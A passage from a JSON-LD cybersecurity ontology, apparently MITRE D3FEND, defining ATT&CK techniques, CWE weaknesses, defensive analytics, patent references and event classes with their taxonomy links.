          "@id": "d3f:Reference-OpenSourceIntelligenceDeceptions_IllusiveNetworksLtd"
        },
        {
          "@id": "d3f:Reference-SystemAndAMethodForIdentifyingThePresenceOfMalwareAndRansomwareUsingMini-trapsSetAtNetworkEndpoints_FidelisCybersecuritySolutionsInc"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodsThereofForPreventingRansomwareFromEncryptingDataElementsStoredInAMemoryOfAComputer-basedSystem_PaloAltoNetworksInc"
        },
        {
          "@id": "d3f:Reference-SupplyChainCyber-deception_Cymmetria,Inc."
        }
      ],
      "d3f:spoofs": {
        "@id": "d3f:File"
      },
      "rdfs:label": "Decoy File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DecoyObject"
        },
        {
          "@id": "_:Ne048c668b6d74f4f8a40a4e492029371"
        }
      ]
    },
    {
      "@id": "_:Ne048c668b6d74f4f8a40a4e492029371",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:spoofs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:PhysicalAttacker",
      "@type": "owl:Class",
      "d3f:definition": "An attacker who is physically close enough to interact with the system directly, such as through physical access to devices.",
      "rdfs:label": "Physical Attacker",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:LocalAttacker"
        },
        {
          "@id": "_:Na0765048a8ab4f9e819b56e3378dc736"
        },
        {
          "@id": "_:Ned516982de9342e18c7d9a21e872b64a"
        }
      ]
    },
    {
      "@id": "_:Na0765048a8ab4f9e819b56e3378dc736",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ComputerPlatform"
      }
    },
    {
      "@id": "_:Ned516982de9342e18c7d9a21e872b64a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:CCI-002891_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements remote disconnect verification at the termination of nonlocal maintenance and diagnostic sessions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:RemoteTerminalSessionDetection"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-22T00:00:00"
      },
      "rdfs:label": "CCI-002891"
    },
    {
      "@id": "d3f:Reference-CAR-2014-05-001%3ARPCActivity_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2014-05-001/"
      },
      "d3f:kb-abstract": "Microsoft Windows uses its implementation of Distributed Computing Environment/Remote Procedure Call (DCE/RPC), which it calls Microsoft RPC, to call certain APIs remotely.\n\nA Remote Procedure Call is initiated by communicating to the RPC Endpoint Mapper, which exists as the Windows service RpcEptMapper and listens on the port 135/tcp. The endpoint mapper resolves a requested endpoint/interface and responds to the client with the port that the service is listening on. Since the RPC endpoints are assigned ports when the services start, these ports are dynamically assigned from 49152 to 65535. The connection to the endpoint mapper then terminates and the client program can communicate directly with the requested service.\n\nRPC is a legitimate functionality of Windows that allows remote interaction with a variety of services. For a Windows environment to be properly configured, several programs use RPC to communicate legitimately with servers. The background and benign RPC activity may be enormous, but must be learned, especially peer-to-peer RPC between workstations, which is often indicative of Lateral Movement.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:RPCTrafficAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2014-05-001: RPC Activity",
      "rdfs:label": "Reference - CAR-2014-05-001: RPC Activity - MITRE"
    },
    {
      "@id": "d3f:CWE-1025",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1025",
      "d3f:definition": "The code performs a comparison between two entities, but the comparison examines the wrong factors or characteristics of the entities, which can lead to incorrect results and resultant weaknesses.",
      "rdfs:label": "Comparison Using Wrong Factors",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-697"
      }
    },
    {
      "@id": "d3f:WindowsNtResumeThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Windows NtResumeThread",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIResumeThread"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2016-04-004_SuccessfulLocalAccountLogin",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2016-04-004/"
      },
      "d3f:kb-reference-of": {
        "@id": "d3f:LocalAccountMonitoring"
      },
      "d3f:kb-reference-title": "Reference - CAR-2016-04-004: Successful Local Account Login",
      "rdfs:label": "Reference - CAR-2016-04-004: Successful Local Account Login"
    },
    {
      "@id": "d3f:AnonymousPipe",
      "@type": "owl:Class",
      "d3f:definition": "In computer science, an anonymous pipe is a simplex FIFO communication channel that may be used for one-way interprocess communication (IPC). An implementation is often integrated into the operating system's file IO subsystem. Typically a parent program opens anonymous pipes, and creates a new process that inherits the other ends of the pipes, or creates several new processes and arranges them in a pipeline.",
      "rdfs:isDefinedBy": {
        "@id": "https://en.wikipedia.org/wiki/Anonymous_pipe"
      },
      "rdfs:label": "Anonymous Pipe",
      "rdfs:subClassOf": {
        "@id": "d3f:Pipe"
      }
    },
    {
      "@id": "d3f:T1542",
      "@type": "owl:Class",
      "d3f:attack-id": "T1542",
      "d3f:definition": "Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.(Citation: Wikipedia Booting)",
      "rdfs:label": "Pre-OS Boot",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        }
      ]
    },
    {
      "@id": "d3f:AML.T0072",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0072",
      "d3f:definition": "Adversaries may utilize a reverse shell to communicate and control the victim system.\n\nTypically, a user uses a client to connect to a remote machine which is listening for connections. With a reverse shell, the adversary is listening for incoming connections initiated from the victim system.",
      "rdfs:label": "Reverse Shell - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0072"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASCommandAndControlTechnique"
      },
      "skos:prefLabel": "Reverse Shell"
    },
    {
      "@id": "d3f:CWE-1300",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1300",
      "d3f:definition": "The device does not contain sufficient protection mechanisms to prevent physical side channels from exposing sensitive information due to patterns in physically observable phenomena such as variations in power consumption, electromagnetic emissions (EME), or acoustic emissions.",
      "rdfs:label": "Improper Protection of Physical Side Channels",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-203"
      }
    },
    {
      "@id": "d3f:Reference-MethodAndSystemForDetectingRestrictedContentAssociatedWithRetrievedContent_SophosLtd",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20160359883A1"
      },
      "d3f:kb-abstract": "In embodiments of the present invention improved capabilities are described for detecting restricted content associated with retrieved content. The method and system may include receiving a client request for content, saving contextual information from the client request, presenting retrieved content in response to the client request, and presenting the contextual information from the client request, and retrieved content, to a scanning facility. The scanning facility may utilize the contextual information from the client request to aid in the detection of restricted content associated with retrieved content.",
      "d3f:kb-author": "Fraser Howard; Paul Baccas; Vanja Svajcer; Benjamin John Godwood; William James McCourt",
      "d3f:kb-mitre-analysis": "This patent describes analyzing contextual information of a Uniform Resource Identifier (URI), such as source or origin of the request URI, patterns in the way the URI is delivered, and the locale of the URI. The contextual information is sent to a scanning facility which uses that information along with a blacklist of known malicious domain names, locations, patterns, etc. to block retrieved content associated with the request URI.",
      "d3f:kb-organization": "Sophos Ltd",
      "d3f:kb-reference-of": {
        "@id": "d3f:URLAnalysis"
      },
      "d3f:kb-reference-title": "Method and system for detecting restricted content associated with retrieved content",
      "rdfs:label": "Reference - Method and system for detecting restricted content associated with retrieved content - Sophos Ltd"
    },
    {
      "@id": "d3f:T0881",
      "@type": "owl:Class",
      "d3f:attack-id": "T0881",
      "d3f:definition": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment. (Citation: Enterprise ATT&CK)  Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct Data Destruction. (Citation: Enterprise ATT&CK)",
      "rdfs:label": "Service Stop - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
      },
      "skos:prefLabel": "Service Stop"
    },
    {
      "@id": "d3f:Reference-Network-BasedBufferOverflowDetectionByExploitCodeAnalysis_InformationSecurityResearchCentre",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://eprints.qut.edu.au/21172/1/21172.pdf"
      },
      "d3f:kb-abstract": "Buffer overflow attacks continue to be a major security problem and detecting attacks of this nature\nis therefore crucial to network security. Signature based network based intrusion detection systems (NIDS)\ncompare network traffic to signatures modelling suspicious or attack traffic to detect network attacks. Since\ndetection is based on pattern matching, a signature modelling the attack must exist for the NIDS to detect it, and\nit is therefore only capable of detecting known attacks. This paper proposes a method to detect buffer overflow\nattacks by parsing the payload of network packets in search of shellcode which is the remotely executable\ncomponent of a buffer overflow attack. By analysing the shellcode it is possible to determine which system\ncalls the exploit uses, and hence the operation of the exploit. Current NIDS-based buffer overflow detection\ntechniques mainly rely upon specific signatures for each new attack. Our approach is able to detect previously\nunseen buffer overflow attacks, in addition to existing ones, without the need for specific signatures for each\nnew attack. The method has been implemented and tested for buffer overflow attacks on Linux on the Intel x86\narchitecture using the Snort NIDS.",
      "d3f:kb-author": "Stig Andersson, Andrew Clark, and George Mohay",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Information Security Research Centre",
      "d3f:kb-reference-of": {
        "@id": "d3f:ByteSequenceEmulation"
      },
      "d3f:kb-reference-title": "Network-Based Buffer Overflow Detection by Exploit Code Analysis",
      "rdfs:label": "Reference - Network-Based Buffer Overflow Detection by Exploit Code Analysis - Information Security Research Centre"
    },
    {
      "@id": "d3f:TrustedAttacker",
      "@type": "owl:Class",
      "d3f:definition": "An individual who exploits their authorized access to conduct unauthorized actions, either intentionally or through negligence.",
      "rdfs:label": "Trusted Attacker",
      "rdfs:subClassOf": {
        "@id": "d3f:Attacker"
      }
    },
    {
      "@id": "d3f:MotionDetectedEvent",
      "@type": "owl:Class",
      "rdfs:label": "Motion Detected Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalAccessAlarmEvent"
        },
        {
          "@id": "_:N8faa83fbd4ed410fb536c400f07b8cd1"
        }
      ]
    },
    {
      "@id": "_:N8faa83fbd4ed410fb536c400f07b8cd1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MotionDetector"
      }
    },
    {
      "@id": "d3f:T1069",
      "@type": "owl:Class",
      "d3f:attack-id": "T1069",
      "d3f:definition": "Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.",
      "rdfs:label": "Permission Groups Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:ProcessEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing lifecycle transitions, interactions, or activities of computer processes, including their creation, termination, and inter-process communication.",
      "rdfs:label": "Process Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/process_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:N1a035736e62d463499aa43c5989f3016"
        }
      ]
    },
    {
      "@id": "_:N1a035736e62d463499aa43c5989f3016",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:NTPEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the Network Time Protocol (NTP), a protocol designed to synchronize the clocks of computer systems over packet-switched, variable-latency data networks, using UDP as its transport protocol.",
      "rdfs:label": "NTP Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/ntp_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationLayerEvent"
        },
        {
          "@id": "d3f:UDPEvent"
        },
        {
          "@id": "_:N088f8cc037bb40f89693e2b423a5caca"
        }
      ]
    },
    {
      "@id": "_:N088f8cc037bb40f89693e2b423a5caca",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTimeServer"
      }
    },
    {
      "@id": "d3f:DS0015",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:broader": {
        "@id": "d3f:Log"
      },
      "d3f:definition": "Events collected by third-party services such as mail servers, web applications, or other appliances (not by the native OS or platform)",
      "rdfs:label": "Application Log (ATT&CK DS)"
    },
    {
      "@id": "d3f:OSAPITraceThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that enables a program to monitor, control, or interact with the execution of a thread.",
      "d3f:invokes": {
        "@id": "d3f:TraceThread"
      },
      "rdfs:label": "OS API Trace Thread",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N027b967a6ef14ee3be939cf8337e845a"
        }
      ]
    },
    {
      "@id": "_:N027b967a6ef14ee3be939cf8337e845a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TraceThread"
      }
    },
    {
      "@id": "d3f:T1034",
      "@type": "owl:Class",
      "d3f:attack-id": "T1034",
      "d3f:definition": "**This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).**",
      "owl:deprecated": true,
      "rdfs:comment": "**This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).**",
      "rdfs:label": "Path Interception",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:OTEstablishRemoteConnectionCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Used to establish a TCP/IP connection to the target device.",
      "rdfs:label": "OT Establish Remote Connection Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTConnectionCommandEvent"
        },
        {
          "@id": "_:Nbccf9133bb9c4bb5907bd31067a62a19"
        }
      ]
    },
    {
      "@id": "_:Nbccf9133bb9c4bb5907bd31067a62a19",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTEstablishRemoteConnectionCommand"
      }
    },
    {
      "@id": "d3f:T1592.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1592.002",
      "d3f:definition": "Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).",
      "rdfs:label": "Software",
      "rdfs:subClassOf": {
        "@id": "d3f:T1592"
      }
    },
    {
      "@id": "d3f:CWE-307",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-307",
      "d3f:definition": "The product does not implement sufficient measures to prevent multiple failed authentication attempts within a short time frame.",
      "rdfs:label": "Improper Restriction of Excessive Authentication Attempts",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1390"
        },
        {
          "@id": "d3f:CWE-799"
        }
      ]
    },
    {
      "@id": "d3f:T1072",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:adds": {
        "@id": "d3f:File"
      },
      "d3f:attack-id": "T1072",
      "d3f:definition": "Adversaries may gain access to and use centralized software suites installed within an enterprise to execute commands and move laterally through the network. Configuration management and software deployment applications may be used in an enterprise network or cloud environment for routine administration purposes. These systems may also be integrated into CI/CD pipelines. Examples of such solutions include: SCCM, HBSS, Altiris, AWS Systems Manager, Microsoft Intune, Azure Arc, and GCP Deployment Manager.",
      "d3f:executes": {
        "@id": "d3f:SoftwareDeploymentTool"
      },
      "d3f:installs": {
        "@id": "d3f:Software"
      },
      "rdfs:label": "Software Deployment Tools",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionTechnique"
        },
        {
          "@id": "d3f:LateralMovementTechnique"
        },
        {
          "@id": "_:N00bc76040e15494280f78745328d9a24"
        },
        {
          "@id": "_:N42439ad5a7874bdc8ef3aaef4abebecb"
        },
        {
          "@id": "_:N3a37d90d57654b5489d0aa1861c73936"
        }
      ]
    },
    {
      "@id": "_:N00bc76040e15494280f78745328d9a24",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:adds"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "_:N42439ad5a7874bdc8ef3aaef4abebecb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SoftwareDeploymentTool"
      }
    },
    {
      "@id": "_:N3a37d90d57654b5489d0aa1861c73936",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:installs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:T1507",
      "@type": "owl:Class",
      "d3f:attack-id": "T1507",
      "d3f:definition": "Adversaries may use device sensors to collect information about nearby networks, such as Wi-Fi and Bluetooth.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1421",
      "rdfs:label": "Network Information Discovery - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1421"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCollectionTechnique"
      },
      "skos:prefLabel": "Network Information Discovery"
    },
    {
      "@id": "d3f:T1584.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1584.001",
      "d3f:definition": "Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)",
      "rdfs:label": "Domains",
      "rdfs:subClassOf": {
        "@id": "d3f:T1584"
      }
    },
    {
      "@id": "d3f:HeterogeneousFeature-basedTransferLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-HFBTL",
      "d3f:definition": "Symmetric transformation takes both the source feature space Xs and target feature space Xt and learns feature transformations so as to project each onto a common subspace Xc for adaptation purposes. This derived subspace becomes a domain-invariant feature subspace to associate cross-domain data, and in effect, reduces marginal distribution differences.",
      "d3f:kb-article": "## References\nWang, Q., Mao, K. Z., Wang, B., & Guan, J. (2017). Big data clustering by hybrid optimization algorithm. Journal of Big Data, 4(1), 25. [Link](https://journalofbigdata.springeropen.com/articles/10.1186/s40537-017-0089-0).",
      "rdfs:label": "Heterogeneous Feature-based Transfer Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:HeterogeneousTransferLearning"
      }
    },
    {
      "@id": "d3f:MacOSKeychain",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Keychain is the password management system in macOS, developed by Apple. It was introduced with Mac OS 8.6, and has been included in all subsequent versions of the operating system, now known as macOS. A Keychain can contain various types of data: passwords (for websites, FTP servers, SSH accounts, network shares, wireless networks, groupware applications, encrypted disk images), private keys, certificates, and secure notes.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Keychain_(software)"
      },
      "rdfs:label": "MacOS Keychain",
      "rdfs:subClassOf": {
        "@id": "d3f:PasswordStore"
      },
      "skos:altLabel": "Keychain"
    },
    {
      "@id": "d3f:PropositionalLogic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PL",
      "d3f:definition": "Propositional logic deals with statements (i.e., propositions, which can be true or false) and relations between propositions, including the construction of arguments based on them.",
      "d3f:kb-article": "## How it works\nCompound propositions are formed by connecting propositions by logical connectives. Propositions that contain no logical connectives are called atomic propositions.\n\n## References\n1. Propositional Calculus. (2022, May 31). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Propositional_calculus)",
      "d3f:synonym": "Propositional Calculus",
      "rdfs:label": "Propositional Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:SymbolicAI"
      }
    },
    {
      "@id": "d3f:T1098.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1098.002",
      "d3f:definition": "Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account.",
      "d3f:modifies": {
        "@id": "d3f:DomainUserAccount"
      },
      "rdfs:label": "Additional Email Delegate Permissions",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1098"
        },
        {
          "@id": "_:N54a9601e016c470abd16cd86fc374729"
        }
      ]
    },
    {
      "@id": "_:N54a9601e016c470abd16cd86fc374729",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DomainUserAccount"
      }
    },
    {
      "@id": "d3f:CWE-507",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-507",
      "d3f:definition": "The product appears to contain benign or useful functionality, but it also contains code that is hidden from normal operation that violates the intended security policy of the user or the system administrator.",
      "rdfs:label": "Trojan Horse",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-506"
      }
    },
    {
      "@id": "d3f:CWE-294",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-294",
      "d3f:definition": "A capture-replay flaw exists when the design of the product makes it possible for a malicious user to sniff network traffic and bypass authentication by replaying it to the server in question to the same effect as the original message (or with minor changes).",
      "rdfs:label": "Authentication Bypass by Capture-replay",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1390"
      }
    },
    {
      "@id": "d3f:Reference-SystemAndMethodsThereofForLogicalIdentificationOfMaliciousThreatsAcrossAPluralityOfEnd-pointDevicesCommunicativelyConnectedByANetwork_PaloAltoNetworksIncCyberSecdoLtd",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20180373870A1/en?oq=US-2018373870-A1"
      },
      "d3f:kb-abstract": "A computerized method for logical identification of malicious threats across a plurality of end-point devices (EPD) communicatively connected by a network, comprising collecting over the network an identifier associated with each file of a plurality of files, wherein each file of the plurality of files is installed on at least one of the plurality of EPDs and wherein the identifier is the same for each like file of the plurality of file. Information associated with an identified subset of files is collected, wherein the information indicates at least a time at which the at least one file was installed on one or more of the plurality of EPDs and the way the at least one file spread within the network. The collected information is analyzed according to a set of predetermined computerized investigation rules. The analysis is used to determine whether at least a file of the identified subset files is a suspicious file.",
      "d3f:kb-author": "Gil BARAK",
      "d3f:kb-mitre-analysis": "This patent describes detecting suspicious files using file metadata such as the prevalence of the file deployed on the network, file installation times, and how the file was spread within the network. The combination of these factors is used to determine a risk score for the file, and if the score is below a threshold, an alert is sent.",
      "d3f:kb-organization": "Palo Alto Networks IncCyber Secdo Ltd",
      "d3f:kb-reference-of": {
        "@id": "d3f:FileContentRules"
      },
      "d3f:kb-reference-title": "System and methods thereof for logical identification of malicious threats across a plurality of end-point devices (epd) communicatively connected by a network",
      "rdfs:label": "Reference - System and methods thereof for logical identification of malicious threats across a plurality of end-point devices (epd) communicatively connected by a network - Palo Alto Networks IncCyber Secdo Ltd"
    },
    {
      "@id": "d3f:CWE-188",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-188",
      "d3f:definition": "The product makes invalid assumptions about how protocol data or memory is organized at a lower level, resulting in unintended program behavior.",
      "rdfs:label": "Reliance on Data/Memory Layout",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1105"
        },
        {
          "@id": "d3f:CWE-435"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1384",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1384",
      "d3f:definition": "The product does not properly handle unexpected physical or environmental conditions that occur naturally or are artificially induced.",
      "rdfs:label": "Improper Handling of Physical or Environmental Conditions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-703"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2020-11-001%3ABootOrLogonInitializationScripts_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-11-001/"
      },
      "d3f:kb-abstract": "Adversaries may schedule software to run whenever a user logs into the system; this is done to establish persistence and sometimes for lateral movement. This trigger is established through the registry key HKEY_CURRENT_USER\\Environment\\UserInitMprLogonScript. This signature looks for edits to existing keys or creation of new keys in that path. Users purposefully adding benign scripts to this path will result in false positives; that case is rare, however. There are other ways of running a script at startup or login that are not covered in this signature. Note that this signature overlaps with the Windows Sysinternals Autoruns tool, which would also show changes to this registry path.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemInitConfigAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-11-001: Boot or Logon Initialization Scripts",
      "rdfs:label": "Reference - CAR-2020-11-001: Boot or Logon Initialization Scripts - MITRE"
    },
    {
      "@id": "d3f:T1626",
      "@type": "owl:Class",
      "d3f:attack-id": "T1626",
      "d3f:definition": "Adversaries may circumvent mechanisms designed to control elevated privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can gain on a machine. Authorization has to be granted to specific users in order to perform tasks that are designated as higher risk. An adversary can use several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.",
      "rdfs:label": "Abuse Elevation Control Mechanism - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobilePrivilegeEscalationTechnique"
      },
      "skos:prefLabel": "Abuse Elevation Control Mechanism"
    },
    {
      "@id": "d3f:CWE-79",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-79",
      "d3f:definition": "The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.",
      "d3f:synonym": [
        "CSS",
        "DOM-Based XSS / Type 0 XSS",
        "HTML Injection",
        "Reflected XSS / Non-Persistent XSS / Type 1 XSS",
        "Stored XSS / Persistent XSS / Type 2 XSS",
        "XSS"
      ],
      "d3f:weakness-of": {
        "@id": "d3f:UserInputFunction"
      },
      "rdfs:label": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-74"
        },
        {
          "@id": "_:N6c583a90b3ef4edbb0a3eff997be7cc4"
        }
      ]
    },
    {
      "@id": "_:N6c583a90b3ef4edbb0a3eff997be7cc4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInputFunction"
      }
    },
    {
      "@id": "d3f:T1020",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1020",
      "d3f:definition": "Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020)",
      "d3f:produces": {
        "@id": "d3f:InternetNetworkTraffic"
      },
      "rdfs:label": "Automated Exfiltration",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExfiltrationTechnique"
        },
        {
          "@id": "_:N9e1c9dc329b94e8dbc490acbf5ff6cee"
        }
      ]
    },
    {
      "@id": "_:N9e1c9dc329b94e8dbc490acbf5ff6cee",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:WatchdogTimerResetEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a watchdog timer is reset as a consequence of watchdog timer expiry or watchdog timer escalation policy.",
      "rdfs:label": "Watchdog Timer Reset Event",
      "rdfs:subClassOf": {
        "@id": "d3f:WatchdogTimerEvent"
      }
    },
    {
